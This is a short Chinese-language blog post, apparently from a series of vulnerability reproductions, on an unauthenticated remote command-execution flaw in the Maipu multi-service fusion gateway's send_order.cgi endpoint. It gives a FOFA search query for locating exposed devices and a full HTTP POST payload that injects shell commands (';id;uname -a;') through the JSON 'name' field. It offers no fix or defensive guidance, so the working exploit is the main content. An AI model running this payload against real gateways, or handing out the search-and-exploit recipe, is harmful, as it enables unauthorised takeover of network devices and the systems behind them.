Babing
Published on 2024-08-30 / 2 Visits
0
0

M13-1迈普-多业务融合网关-RCE

M13-1迈普-多业务融合网关-RCE

漏洞描述:

迈普 多业务融合网关 send_order.cgi 接口处存在命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,从而获取服务器shell权限。

网站图片:

网站图片

fofa语法:

title==“迈普多业务融合网关”

漏洞复现:

payload:

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64MHhzZWM=; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

{"opid":"1","name":";id;uname -a;","type":"rest"}

效果图:
效果图


Comment